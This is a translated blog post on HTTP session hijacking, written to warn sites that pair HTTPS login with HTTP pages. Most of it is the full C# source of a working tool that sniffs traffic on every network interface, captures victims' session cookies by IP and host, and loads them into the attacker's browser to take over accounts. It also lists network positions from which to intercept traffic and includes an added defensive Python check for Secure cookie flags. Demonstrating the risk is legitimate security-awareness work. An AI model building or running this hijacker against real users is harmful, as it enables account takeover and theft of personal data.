Watch this 48-second animation and you won't dare sign in to an HTTP website again (complete sample code included)


Original article: http://www.cnblogs.com/baibaomen/p/http-session-hijack.html

In my single sign-on (SSO) sample code article, I strongly advised against deploying the SSO service endpoint over HTTP.

This time I wrote an HTTP session hijacking program based on network packet sniffing, to give everyone a visual demonstration of the harm.

In the example, I log in to 58 Tongcheng on a Mac, and the session is hijacked by the program running on a separate Windows machine. The "hacker" can view my information unimpeded and can even change my avatar.

Here is the animation, 48 seconds long:

Original Address: HTTP Session Hijacking example-Single sign-on SSO

58 Tongcheng uses HTTPS for user login, yet it still did not escape session hijacking. Most of the better-run sites follow a similar pattern: login goes over HTTPS, and the main traffic goes over HTTP.

Testing showed that many sites using this pattern, including CSDN and QQ Mail (yes, it even has an HTTP version), have no protection against session hijacking. Blog Park (cnblogs) is actually affected as well, but it moved all sensitive operations to HTTPS, so the impact there is small.

In fact, a site that carries its traffic over HTTP and authenticates over HTTPS can be made immune to session hijacking with slight modifications. Major websites can download my program to check for themselves whether they have the flaw, and I can provide targeted patch support.
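An added example (not from the original article or the author's program): a Python self-check for the "HTTPS login, HTTP traffic" pattern described above. It assumes the common hardening of marking the session cookie Secure, which the article itself does not spell out; the cookie names and header values are constructed.

```python
from http.cookies import SimpleCookie

# Constructed Set-Cookie headers from an HTTPS login response (sample data, not from a real site).
WEAK_LOGIN = [
    "SESSIONID=7d1f0c; Path=/; HttpOnly",   # no Secure: also sent on http:// pages
    "lang=en; Path=/",
]
# Assumed hardening: the credential cookie is Secure; HTTP pages get only a non-sensitive hint.
HARDENED_LOGIN = [
    "SESSIONID=7d1f0c; Path=/; Secure; HttpOnly",
    "loggedin=1; Path=/",
    "lang=en; Path=/",
]

def parse_set_cookie(headers):
    """Parse Set-Cookie header values into {name: {"value", "secure", "httponly"}}."""
    jar = {}
    for header in headers:
        parsed = SimpleCookie()
        parsed.load(header)
        for name, morsel in parsed.items():
            jar[name] = {
                "value": morsel.value,
                "secure": bool(morsel["secure"]),
                "httponly": bool(morsel["httponly"]),
            }
    return jar

def cookies_sent(jar, scheme):
    """Cookies a browser attaches to a request with the given scheme ("http" or "https")."""
    return {n: c["value"] for n, c in jar.items() if scheme == "https" or not c["secure"]}

def exposed_on_http(headers, sensitive_names):
    """Sensitive cookies that would cross the network in cleartext on the HTTP leg."""
    cleartext = cookies_sent(parse_set_cookie(headers), "http")
    return sorted(name for name in cleartext if name in sensitive_names)

def http_request_is_authenticated(request_cookies, sessions):
    """Server-side view: a request carries an identity only if a valid SESSIONID arrives.
    With the Secure flag set, a cleartext Cookie header never contains it."""
    return request_cookies.get("SESSIONID") in sessions

if __name__ == "__main__":
    for label, headers in (("weak", WEAK_LOGIN), ("hardened", HARDENED_LOGIN)):
        print(label, "exposed on HTTP:", exposed_on_http(headers, {"SESSIONID"}))
```

With the hardened headers, pages served over HTTP can no longer see the session, so any operation that needs the user's identity has to be served over HTTPS.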

The following is the main code of the example. It is quite simple: it references the Pcap.Net component, which requires WinPcap to be installed. Packet sniffing with this component is only one way of doing session hijacking, and it has practical limitations, so the example code is more a demo program than a hacker tool. The limitations are explained below.

To follow the latest code, watch me on GitHub. Source: https://github.com/baibaomen/Baibaomen.HttpHijacker

using PcapDotNet.Core;
using PcapDotNet.Packets;
using System;
using System.Collections.Concurrent;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Baibaomen.HttpHijacker
{
    public partial class FormHijacker : Form
    {
        /// <summary>
        /// The cookie collection of each device that is sniffed.
        /// </summary>
        ConcurrentDictionary<string, ConcurrentDictionary<string, string>> clientCookies =
            new ConcurrentDictionary<string, ConcurrentDictionary<string, string>>();

        public FormHijacker()
        {
            InitializeComponent();
        }

        private void FormHijacker_Load(object sender, EventArgs e)
        {
            StartHijack();
        }

        public void StartHijack()
        {
            Task.Run(delegate
            {
                IList<LivePacketDevice> allDevices = LivePacketDevice.AllLocalMachine;
                if (allDevices.Count == 0)
                {
                    MessageBox.Show("NIC not found. Make sure WinPcap is installed.");
                    return;
                }

                // Listen on every local network interface, one task per device.
                foreach (var selectedDevice in allDevices)
                {
                    Task.Run(delegate
                    {
                        PacketCommunicator communicator = selectedDevice.Open(
                            65536, PacketDeviceOpenAttributes.Promiscuous, 1000);
                        if (communicator.DataLink.Kind != DataLinkKind.Ethernet)
                        {
                            return;
                        }
                        // Plain HTTP requests only.
                        using (BerkeleyPacketFilter filter = communicator.CreateFilter("tcp and dst port 80"))
                        {
                            communicator.SetFilter(filter);
                        }
                        communicator.ReceivePackets(0, PacketHandler);
                    });
                }

                this.BeginInvoke(new EventHandler(delegate
                {
                    lbMsg.Text = "Listener started";
                }));
            });
        }

        private void PacketHandler(Packet packet)
        {
            try
            {
                var sourceIP = packet.Ethernet.IpV4.Source.ToString();
                var http = packet?.Ethernet?.IpV4?.Tcp?.Http;
                if (http == null || http.Header == null) return;
                if (http.IsRequest && http.IsValid)
                {
                    string msg = http.Decode(Encoding.UTF8);
                    // Intercept only web page body requests.
                    if (!string.IsNullOrEmpty(msg))
                    {
                        var lines = msg.Split(new string[] { "\r\n" }, StringSplitOptions.RemoveEmptyEntries);
                        var host = lines.FirstOrDefault(x => x.StartsWith("Host:"))?.Substring("Host:".Length).Trim();
                        var cookie = lines.FirstOrDefault(x => x.StartsWith("Cookie:"))?.Substring("Cookie:".Length).Trim();
                        if (string.IsNullOrEmpty(host)) return;
                        if (!string.IsNullOrEmpty(cookie))
                        {
                            // Remember the latest Cookie header per client IP and host.
                            var cCookies = clientCookies.GetOrAdd(sourceIP,
                                new ConcurrentDictionary<string, string>());
                            cCookies.AddOrUpdate(host, cookie, (key, oldVal) => cookie);
                        }
                        // Sift out requests for resource files, etc. to make the data cleaner.
                        if (msg.StartsWith("GET ") &&
                            (msg.Contains("\nAccept: text/html") || msg.Contains("\nAccept: text/plain")))
                        {
                            var pathAndQuery = lines[0]
                                .Substring(0, lines[0].LastIndexOf("HTTP/"))
                                .Substring("GET ".Length)
                                .Trim();
                            this.BeginInvoke(new EventHandler(delegate
                            {
                                lstSessions.Items.Insert(0, $"{sourceIP}\t{DateTime.Now}\thttp://{host + pathAndQuery}");
                            }));
                        }
                    }
                }
            }
            catch // The sniffed data may be incomplete, so it is discarded.
            {
            }
        }

        [DllImport("wininet.dll", CharSet = CharSet.Auto, SetLastError = true)]
        public static extern bool InternetSetCookie(string lpszUrlName, string lbszCookieName, string lpszCookieData);

        private void btnHijack_Click(object sender, EventArgs e)
        {
            var selected = lstSessions.SelectedItem;
            if (selected == null)
            {
                MessageBox.Show("Select the session to be hijacked");
                return;
            }

            var segments = selected.ToString().Split('\t');
            var ip = segments[0];
            var url = segments[2];
            var cookies = clientCookies[ip];
            foreach (var domainCookie in cookies) // Set the sniffed cookies as browser cookies.
            {
                foreach (var item in domainCookie.Value.Split(';'))
                {
                    try
                    {
                        var name = item.Substring(0, item.IndexOf('=')).Trim();
                        var value = item.Substring(item.IndexOf('=') + 1);
                        InternetSetCookie("http://" + domainCookie.Key, name,
                            value + ";expires=" + DateTime.UtcNow.AddMinutes(10).ToString("R"));
                    }
                    catch { } // No conforming data. The sniffed data may be incomplete, so it is discarded.
                }
            }

            if (lstSessions.SelectedItem != null)
            {
                Process.Start("iexplore.exe", url);
            }
        }
    }
}

Session hijacking can occur at a number of places and along a number of paths:

    1. Specially configured routers/switches; all hubs; virtual machines on the same physical machine
    2. All Internet proxies
    3. Local area networks that are open to ARP attacks
    4. Unsecured wireless networks
    5. Network operators, which have the ability to hijack. Visits to HTTP websites used to show ads injected by the network operator quite often, which indicates that the operator was parsing the HTTP data

As you can see, session hijacking can happen in a wide range of scenarios.

This example uses the first approach mentioned above, which has significant limitations. Apart from some organizations or schools that still use cheap hubs, most machines reach the network through routers and switches. There, only a machine that has been specifically configured and designated on a device that supports it can sniff packets from other machines.

Virtual machines on the same physical machine share one physical NIC, so they can sniff each other's traffic without any configuration on the switch or router. Using a virtual machine environment is a quick way to run this example.
